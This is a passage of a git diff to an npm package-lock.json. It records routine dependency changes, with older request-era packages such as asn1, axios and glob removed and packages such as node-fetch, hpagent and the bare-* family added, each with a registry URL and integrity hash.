"sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==", - "optional": true + "@types/js-yaml": { + "version": "4.0.9", + "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.9.tgz", + "integrity": "sha512-k4MGaQl5TGo/iipqb2UDG2UwjXziSWkh0uysQelTlJpX1qGlpUZYm8PnO4DxG1qBomtJUdYJ6qR6xdIah10JLg==" + }, + "@types/node": { + "version": "22.10.2", + "resolved": "https://registry.npmjs.org/@types/node/-/node-22.10.2.tgz", + "integrity": "sha512-Xxr6BBRCAOQixvonOye19wnzyDiUtTeqldOOmj3CkeblonbccA12PFwlufvRdrpjXxqnmUaeiU5EOA+7s5diUQ==", + "requires": { + "undici-types": "~6.20.0" + } + }, + "@types/node-fetch": { + "version": "2.6.12", + "resolved": "https://registry.npmjs.org/@types/node-fetch/-/node-fetch-2.6.12.tgz", + "integrity": "sha512-8nneRWKCg3rMtF69nLQJnOYUcbafYeFSjqkw3jCRLsqkWFlHaoQrr5mXmofFGOx3DKn7UfmBMyov8ySvLRVldA==", + "requires": { + "@types/node": "*", + "form-data": "^4.0.0" + } + }, + "@types/stream-buffers": { + "version": "3.0.7", + "resolved": "https://registry.npmjs.org/@types/stream-buffers/-/stream-buffers-3.0.7.tgz", + "integrity": "sha512-azOCy05sXVXrO+qklf0c/B07H/oHaIuDDAiHPVwlk3A9Ek+ksHyTeMajLZl3r76FxpPpxem//4Te61G1iW3Giw==", + "requires": { + "@types/node": "*" + } + }, + "agent-base": { + "version": "7.1.3", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.3.tgz", + "integrity": "sha512-jRR5wdylq8CkOe6hei19GGZnxM6rBGwFl3Bg0YItGDimvjGtAvdZk4Pu6Cl4u4Igsws4a1fd1Vq3ezrhn4KmFw==" }, "ajv": { "version": "8.17.1", @@ -1328,120 +757,62 @@ "ajv": "^8.0.0" } }, - "ansi-regex": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.1.0.tgz", - "integrity": "sha512-7HSX4QQb4CspciLpVFwyRe79O3xsIZDDLER21kERQ71oaPodF8jL725AgJMFAYbooIqolJoRLuM81SpeUkpkvA==" - }, - "ansi-styles": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.1.tgz", - "integrity": "sha512-bN798gFfQX+viw3R7yrGWRqnrN2oRkEkUjjl4JNn4E8GxxbjtG3FbrEIIY3l8/hrwUwIeCZvi4QuOTP4MErVug==" - }, "argparse": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" }, - "asn1": { - "version": "0.2.4", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.4.tgz", - "integrity": "sha512-jxwzQpLQjSmWXgwaCZE9Nz+glAG01yF1QnWgbhGwHI5A6FRIEY6IVqtHhIepHqI7/kyEyQEagBC5mBEFlIYvdg==", - "requires": { - "safer-buffer": "~2.1.0" - } - }, - "assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=" - }, "asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=" }, - "aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha1-tG6JCTSpWR8tL2+G1+ap8bP+dqg=" + "b4a": { + "version": "1.6.7", + "resolved": "https://registry.npmjs.org/b4a/-/b4a-1.6.7.tgz", + "integrity": "sha512-OnAYlL5b7LEkALw87fUVafQw5rVR9RjwGd4KUwNQ6DrrNmaVaUCgLipfVlzrPQ4tWOR9P0IXGNOx50jYCCdSJg==" }, - "aws4": { - "version": "1.11.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.11.0.tgz", - "integrity": "sha512-xh1Rl34h6Fi1DC2WWKfxUTVqRsNnr6LsKz2+hfwDxQJWmrx8+c7ylaqBMcHfl1U1r2dsifOvKX3LQuLNZ+XSvA==" + "bare-events": { + "version": "2.5.4", + "resolved": "https://registry.npmjs.org/bare-events/-/bare-events-2.5.4.tgz", + "integrity": "sha512-+gFfDkR8pj4/TrWCGUGWmJIkBwuxPS5F+a5yWjOHQt2hHvNZd5YLzadjmDUtFmMM4y429bnKLa8bYBMHcYdnQA==", + "optional": true }, - "axios": { - "version": "1.7.9", - "resolved": "https://registry.npmjs.org/axios/-/axios-1.7.9.tgz", - "integrity": "sha512-LhLcE7Hbiryz8oMDdDptSrWowmB4Bl6RCt6sIJKpRB4XtVf0iEgewX3au/pJqm+Py1kCASkb/FFKjxQaLtxJvw==", + "bare-fs": { + "version": "4.1.5", + "resolved": "https://registry.npmjs.org/bare-fs/-/bare-fs-4.1.5.tgz", + "integrity": "sha512-1zccWBMypln0jEE05LzZt+V/8y8AQsQQqxtklqaIyg5nu6OAYFhZxPXinJTSG+kU5qyNmeLgcn9AW7eHiCHVLA==", + "optional": true, "requires": { - "follow-redirects": "^1.15.6", - "form-data": "^4.0.0", - "proxy-from-env": "^1.1.0" - }, - "dependencies": { - "form-data": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.0.tgz", - "integrity": "sha512-ETEklSGi5t0QMZuiXoA/Q6vcnxcLQP5vdugSpuAyi6SVGi2clPPp+xgEhuMaHC+zGgn31Kd235W35f7Hykkaww==", - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.8", - "mime-types": "^2.1.12" - } - } + "bare-events": "^2.5.4", + "bare-path": "^3.0.0", + "bare-stream": "^2.6.4" } }, - "balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" - }, - "bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha1-pDAdOJtqQ/m2f/PKEaP2Y342Dp4=", - "requires": { - "tweetnacl": "^0.14.3" - } + "bare-os": { + "version": "3.6.1", + "resolved": "https://registry.npmjs.org/bare-os/-/bare-os-3.6.1.tgz", + "integrity": "sha512-uaIjxokhFidJP+bmmvKSgiMzj2sV5GPHaZVAIktcxcpCyBFFWO+YlikVAdhmUo2vYFvFhOXIAlldqV29L8126g==", + "optional": true }, - "brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "bare-path": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/bare-path/-/bare-path-3.0.0.tgz", + "integrity": "sha512-tyfW2cQcB5NN8Saijrhqn0Zh7AnFNsnczRcuWODH0eYAXBsJ5gVxAUuNr7tsHSC6IZ77cA0SitzT+s47kot8Mw==", + "optional": true, "requires": { - "balanced-match": "^1.0.0" + "bare-os": "^3.0.1" } }, - "byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha1-dBxSFkaOrcRXsDQQEYrXfejB3bE=" - }, - "caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha1-G2gcIf+EAzyCZUMJBolCDRhxUdw=" - }, - "chownr": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-3.0.0.tgz", - "integrity": "sha512-+IxzY9BZOQd/XuYPRmrvEVjF/nqj5kgT4kEq7VofrDoM1MxoRjEWkrCC3EtLi59TVawxTAn+orJwFQcrqEN1+g==" - }, - "color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", + "bare-stream": { + "version": "2.6.5", + "resolved": "https://registry.npmjs.org/bare-stream/-/bare-stream-2.6.5.tgz", + "integrity": "sha512-jSmxKJNJmHySi6hC42zlZnq00rga4jjxcgNZjY9N5WlOe/iOoGRtdwGsHzQv2RlH2KOYMwGUXhf2zXd32BA9RA==", + "optional": true, "requires": { - "color-name": "~1.1.4" + "streamx": "^2.21.0" } }, - "color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" - }, "combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", @@ -1450,27 +821,12 @@ "delayed-stream": "~1.0.0" } }, - "core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha1-tf1UIgqivFq1eqtxQMlAdUUDwac=" - }, - "cross-spawn": { - "version": "7.0.6", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", - "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", - "requires": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - } - }, - "dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha1-hTz6D3y+L+1d4gMmuN1YEDX24vA=", + "debug": { + "version": "4.4.1", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.1.tgz", + "integrity": "sha512-KcKCqiftBJcZr++7ykoDIEwSa3XWowTfNPo92BYxjXiyYEVrUQh2aLyhxBCwww+heortUFxEJYcRzosstTEBYQ==", "requires": { - "assert-plus": "^1.0.0" + "ms": "^2.1.3" } }, "delayed-stream": { @@ -1478,172 +834,63 @@ "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk=" }, - "eastasianwidth": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz", - "integrity": "sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==" - }, - "ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha1-OoOpBOVDUyh4dMVkt1SThoSamMk=", + "end-of-stream": { + "version": "1.4.4", + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.4.tgz", + "integrity": "sha512-+uw1inIHVPQoaVuHzRyXd21icM+cnt4CzD5rW+NC1wjOUSTOs+Te7FOv7AhN7vS9x/oIyhLP5PR1H+phQAHu5Q==", "requires": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" + "once": "^1.4.0" } }, - "emoji-regex": { - "version": "9.2.2", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz", - "integrity": "sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==" - }, - "extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" - }, - "extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha1-lpGEQOMEGnpBT4xS48V06zw+HgU=" - }, "fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, - "fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" + "fast-fifo": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/fast-fifo/-/fast-fifo-1.3.2.tgz", + "integrity": "sha512-/d9sfos4yxzpwkDkuN7k2SqFKtYNmCTzgfEpz82x34IM9/zc8KGxQoXg1liNC/izpRM/MBdt44Nmx41ZWqk+FQ==" }, "fast-uri": { "version": "3.0.3", "resolved": "https://registry.npmjs.org/fast-uri/-/fast-uri-3.0.3.tgz", "integrity": "sha512-aLrHthzCjH5He4Z2H9YZ+v6Ujb9ocRuW6ZzkJQOrTxleEijANq4v1TsaPaVG1PZcuurEzrLcWRyYBYXD5cEiaw==" }, - "follow-redirects": { - "version": "1.15.6", - "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.15.6.tgz", - "integrity": "sha512-wWN62YITEaOpSK584EZXJafH1AGpO8RVgElfkuXbTOrPX4fIfOyEpW/CsiNd8JdYrAoOvafRTOEnvsO++qCqFA==" - }, - "foreground-child": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-3.3.0.tgz", - "integrity": "sha512-Ld2g8rrAyMYFXBhEqMz8ZAHBi4J4uS1i/CxGMDnjyFWddMXLVcDp051DZfu+t7+ab7Wv6SMqpWmyFIj5UbfFvg==", - "requires": { - "cross-spawn": "^7.0.0", - "signal-exit": "^4.0.1" - } - }, - "forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha1-+8cfDEGt6zf5bFd60e1C2P2sypE=" - }, - "getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha1-Xv+OPmhNVprkyysSgmBOi6YhSfo=", - "requires": { - "assert-plus": "^1.0.0" - } - }, - "glob": { - "version": "10.4.5", - "resolved": "https://registry.npmjs.org/glob/-/glob-10.4.5.tgz", - "integrity": "sha512-7Bv8RF0k6xjo7d4A/PxYLbUCfb6c+Vpd2/mB2yRDlew7Jb5hEXiCD9ibfO7wpk8i4sevK6DFny9h7EYbM3/sHg==", - "requires": { - "foreground-child": "^3.1.0", - "jackspeak": "^3.1.2", - "minimatch": "^9.0.4", - "minipass": "^7.1.2", - "package-json-from-dist": "^1.0.0", - "path-scurry": "^1.11.1" - } - }, - "har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha1-qUwiJOvKwEeCoNkDVSHyRzW37JI=" - }, - "har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", + "form-data": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.1.tgz", + "integrity": "sha512-tzN8e4TX8+kkxGPK8D5u0FNmjPUjw3lwC9lSLxxoB/+GtsJG91CO8bSWy73APlgAZzZbXEYZJuxjkHH2w+Ezhw==", "requires": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - }, - "dependencies": { - "ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", - "requires": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - } - }, - "json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" - } + "asynckit": "^0.4.0", + "combined-stream": "^1.0.8", + "mime-types": "^2.1.12" } }, - "http-signature": { + "hpagent": { "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha1-muzZJRFHcvPZW2WmCruPfBj7rOE=", + "resolved": "https://registry.npmjs.org/hpagent/-/hpagent-1.2.0.tgz", + "integrity": "sha512-A91dYTeIB6NoXG+PxTQpCCDDnfHsW9kc06Lvpu1TEe9gnd6ZFeiBoRO9JvzEv6xK7EX97/dUE8g/vBMTqTS3CA==" + }, + "ip-address": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-9.0.5.tgz", + "integrity": "sha512-zHtQzGojZXTwZTHQqra+ETKd4Sn3vgi7uBmlPoXVWZqYvuKmtI0l/VZTjqGmJY9x88GGOaZ9+G9ES8hC4T4X8g==", "requires": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" + "jsbn": "1.1.0", + "sprintf-js": "^1.1.3" } }, - "is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==" - }, - "is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha1-5HnICFjfDBsR3dppQPlgEfzaSpo=" - }, - "isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==" - }, "isomorphic-ws": { "version": "5.0.0", "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", "requires": {} }, - "isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha1-R+Y/evVa+m+S4VAOaQ64uFKcCZo=" - }, - "jackspeak": { - "version": "3.4.3", - "resolved": "https://registry.npmjs.org/jackspeak/-/jackspeak-3.4.3.tgz", - "integrity": "sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw==", - "requires": { - "@isaacs/cliui": "^8.0.2", - "@pkgjs/parseargs": "^0.11.0" - } - }, "jose": { "version": "5.9.6", "resolved": "https://registry.npmjs.org/jose/-/jose-5.9.6.tgz", - "integrity": "sha512-AMlnetc9+CV9asI19zHmrgS/WYsWUwCn2R7RzlbJWD7F9eWYUTGyBmU9o6PxngtLGOiDGPRu+Uc4fhKzbpteZQ==", - "optional": true + "integrity": "sha512-AMlnetc9+CV9asI19zHmrgS/WYsWUwCn2R7RzlbJWD7F9eWYUTGyBmU9o6PxngtLGOiDGPRu+Uc4fhKzbpteZQ==" }, "js-yaml": { "version": "4.1.0", @@ -1654,34 +901,24 @@ } }, "jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha1-peZUwuWi3rXyAdls77yoDA7y9RM=" + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", + "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==" }, "jsep": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==" }, - "json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" - }, "json-schema-traverse": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==" }, - "json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha1-Epai1Y/UXxmg9s4B1lcB4sc1tus=" - }, "jsonpath-plus": { - "version": "10.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.2.0.tgz", - "integrity": "sha512-T9V+8iNYKFL2n2rF+w02LBOT2JjDnTjioaNFrxRy0Bv1y/hNsqR/EBK7Ojy2ythRHwmz2cRIls+9JitQGZC/sw==", + "version": "10.3.0", + "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.3.0.tgz", + "integrity": "sha512-8TNmfeTCk2Le33A3vRRwtuworG/L5RrgMvdjhKZxvyShO+mBu2fP50OWUjRLNtvw344DdDarFh9buFAZs5ujeA==", "requires": { "@jsep-plugin/assignment": "^1.3.0", "@jsep-plugin/regex": "^1.0.4", @@ -1693,22 +930,6 @@ "resolved": "https://registry.npmjs.org/jsonpointer/-/jsonpointer-5.0.1.tgz", "integrity": "sha512-p/nXbhSEcu3pZRdkW1OfJhpsVtW1gd4Wa1fnQc9YLiTfAjn0312eMKimbdIQzuZl9aa9xUGaRlP9T/CJE/ditQ==" }, - "jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "requires": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - } - }, - "lru-cache": { - "version": "10.4.3", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-10.4.3.tgz", - "integrity": "sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ==" - }, "mime-db": { "version": "1.49.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.49.0.tgz", @@ -1722,140 +943,48 @@ "mime-db": "1.49.0" } }, - "minimatch": { - "version": "9.0.5", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.5.tgz", - "integrity": "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==", - "requires": { - "brace-expansion": "^2.0.1" - } - }, - "minipass": { - "version": "7.1.2", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.2.tgz", - "integrity": "sha512-qOOzS1cBTWYF4BH8fVePDBOO9iptMnGUEZwNc/cMWnTV2nVLZ7VoNWEPHkYczZA0pdoA7dl6e7FL659nX9S2aw==" + "ms": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==" }, - "minizlib": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-3.0.1.tgz", - "integrity": "sha512-umcy022ILvb5/3Djuu8LWeqUa8D68JaBzlttKeMWen48SjabqS3iY5w/vzeMzMUNhLDifyhbOwKDSznB1vvrwg==", + "node-fetch": { + "version": "2.7.0", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", + "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", "requires": { - "minipass": "^7.0.4", - "rimraf": "^5.0.5" + "whatwg-url": "^5.0.0" } }, - "mkdirp": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-3.0.1.tgz", - "integrity": "sha512-+NsyUUAZDmo6YVHzL/stxSu3t9YS1iljliy3BSDrXJ/dkn1KYdmtZODGGjLcc9XLgVVpH4KshHB8XmZgMhaBXg==" - }, - "oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==" - }, "oauth4webapi": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.1.3.tgz", - "integrity": "sha512-dik5wEMdFL5p3JlijYvM7wMNCgaPhblLIDCZtdXcaZp5wgu5Iwmsu7lMzgFhIDTi5d0BJo03LVoOoFQvXMeOeQ==", - "optional": true + "integrity": "sha512-dik5wEMdFL5p3JlijYvM7wMNCgaPhblLIDCZtdXcaZp5wgu5Iwmsu7lMzgFhIDTi5d0BJo03LVoOoFQvXMeOeQ==" + }, + "once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", + "requires": { + "wrappy": "1" + } }, "openid-client": { "version": "6.1.3", "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.1.3.tgz", "integrity": "sha512-74sc0bR4ptfwCwMheLPaJHTQnds+97Yu6O8eQgoO3MRcd53xkfKyl3gNAsRsYSYoO+AVG3eCgnRMjRkZ6n2RYw==", - "optional": true, "requires": { "jose": "^5.9.6", "oauth4webapi": "^3.1.1" } }, - "package-json-from-dist": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/package-json-from-dist/-/package-json-from-dist-1.0.1.tgz", - "integrity": "sha512-UEZIS3/by4OC8vL3P2dTXRETpebLI2NiI5vIrjaD/5UtrkFX/tNbwjTSRAGC/+7CAo2pIcBaRgWmcBBHcsaCIw==" - }, - "path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==" - }, - "path-scurry": { - "version": "1.11.1", - "resolved": "https://registry.npmjs.org/path-scurry/-/path-scurry-1.11.1.tgz", - "integrity": "sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==", - "requires": { - "lru-cache": "^10.2.0", - "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" - } - }, - "performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha1-Ywn04OX6kT7BxpMHrjZLSzd8nns=" - }, - "proxy-from-env": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz", - "integrity": 